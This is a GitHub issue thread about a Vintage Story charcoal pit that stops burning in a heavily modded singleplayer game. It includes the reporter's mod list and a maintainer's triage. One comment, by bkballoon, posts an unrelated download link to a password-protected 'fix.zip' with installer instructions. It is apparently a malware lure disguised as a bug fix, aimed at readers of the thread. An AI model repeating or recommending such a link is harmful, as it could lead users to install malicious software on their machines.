### ISSUE TITLE
Charcoal pit stops working

### ISSUE THREAD

**Issue by DancingHoskuld** [anegostudios/VintageStory-Issues#4050]
### Game Version

1.19.8 (Stable)

### Platform

Windows

### Modded

Modded

### SP/MP

Singleplayer

### Description

Twice now my charcoal pit has stopped working. 

I fill it up, light it up, seal it up, smoke comes out the top. Then next game day I open it up to find the wood still there, the fire says it is lit but there is no fire or seal warning.

I have tried emptying the pit and refilling it. Also I have moved it elsewhere. However once it fails to burn it wont start again. I had to abandon my last game.

### Logs

```Log```

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Craluminum2413** [comment]
Full list of mods please

**Comment by DancingHoskuld** [comment]
Mods (all are latest versions)

ABCSReborn (Content)
Acorns (Content)
A Culinary Artillery (Code)
AdditionalMolds (Content)
Ancient Tools (Code)
Animal Cages (Content)
Anvil Metal Recovery+ (Code)
Auto Map Markers (Code)
Better Crates (Code)
Better Firepit (Code)
Better Jam (Content)
BetterRuins (Content)
Better Than Heresy (Content)
BetterTraders (Content}
Blacksmiths Enhancements (Code)
Bushmeat Meals (Content)
Carry On (Code)
Cave Content (Content)
CommonLib (Code)
Composter (Code)
craftable+ {Content)
DRBraziers (Content)
Dungeons & Shafts (Code)
easierfruittrees (Content)
Expanded Foods (Code)
FernsLikeGrass (Content)
Flint Chisel (Content)
Floral Zones: Central Australia Region (Content)
Fauna of the Stone Age: Casuariidae Plus (Content)
Fauna of the Stone Age: Dinornithiformes Plus (Content)
From Golden Combs (Code)
Full Drop (Content)
GlowingArrows (Code)
Helve Hammer Extensions (Code)
Herbarium (Code)
HUD Clock (Code)
Just more ruins (Content)
Knapping Mastery (Content)
kreaturesandkritters (Code)
LanternPost (Code) - this doesn't work for me and I should remove it
Lichen Continued (Content)
Mannequin Stand (Code)
Medieval Expansion (Code)
Millwright (Code)
Molds (Code)
More Animals (Code)
More Crops (Content)
MoreCrystals (Content)
More Metals (Code)
YABBA Forge (Content) - aka More Molds
More Piles (Code)
Nails and Strips Mold (Content)
NoMolding (Content)
Oils! (Content)
OresAPlenty Mod (Content)
Primitive Survival (Code)
Ruin Variants (Content)
Salvage+ (Content)
Scraps (Content)
Scythe Mold (Content)
Some Extra Molds (Content)
Panning product recycling (Content)
Stackables (Content)
Stacks (Content)
Stick Crafting (Content)
Stone Bake Oven (Code)
Stone Quarry (Code)
Stone Railings (Content)
Terra Preta Trade (Content)
Th3Dungeon (Code)
Th3DungeonTopEntrance (Content)
Underground Mines (Code)
Useful Scraps (Content)
Still Useful Stuff (Code)

**Comment by Craluminum2413** [comment]
Could you try reproduce bug in flat creative world?

**Comment by DancingHoskuld** [comment]
Both times it has happened it has been 20+ hours into playing a game. That will take me about a week or so real time to do.

>

**Comment by Craluminum2413** [comment]
I assume it is caused by mods then
